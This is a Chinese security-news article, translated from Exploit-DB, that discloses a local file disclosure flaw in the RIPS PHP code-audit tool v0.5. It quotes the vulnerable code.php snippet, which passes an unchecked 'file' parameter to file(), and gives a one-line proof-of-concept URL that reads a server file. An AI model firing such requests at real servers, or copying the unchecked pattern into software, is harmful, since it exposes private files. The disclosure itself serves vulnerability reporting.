主站

分类

漏洞 工具 极客 web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据库安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

FreeBuf+小程序

官方公众号企业安全新浪微博

国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区

PHP代码审计工具Rips Scanners v0.5曝本地文件包含漏洞
2015-12-27 15:00:34

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。


RIPS是一个用php编写的源代码分析工具,它使用了静态分析技术,能够自动化地挖掘PHP源代码潜在的安全漏洞。渗透测试人员可以直接容易的审阅分析结果,而不用审阅整个程序代码。

由于静态源代码分析的限制,漏洞是否真正存在,仍然需要代码审阅者确认。RIPS能够检测XSS、SQL注入、文件泄露、Header Injection漏洞等。

官方网站:http://rips-scanner.sourceforge.net/

在RIPS的code.php文件中:

$file = $_GET['file'];
$marklines = explode(',', $_GET['lines']);
$ext = '.'.pathinfo($file, PATHINFO_EXTENSION);


if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))
{
    $lines = file($file);
    
    // place line numbers in extra table for more elegant copy/paste
out line numbers
    echo '<tr><td><table>';
    for($i=1, $max=count($lines); $i<=$max;$i++)
        echo "<tr><td class=\"linenrcolumn\"><span
s=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>';
    echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';
    
    $in_comment = false;
    for($i=0; $i<$max; $i++)
    {               
        $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);
    }
} else
{
    echo '<tr><td>Invalid file specified.</td></tr>';
}

存在文件包含漏洞

利用如下所示:

http://localhost/rips/windows/code.php?file=/var/www/html/index.php

*原文地址:Exploit-DB ,我是酱油男编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

本文作者:, 转载请注明来自FreeBuf.COM

# 漏洞 # Rips Scanners # V0.5 # 本地文件包涵
被以下专栏收录,发现更多精彩内容
+ 收入我的专栏
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦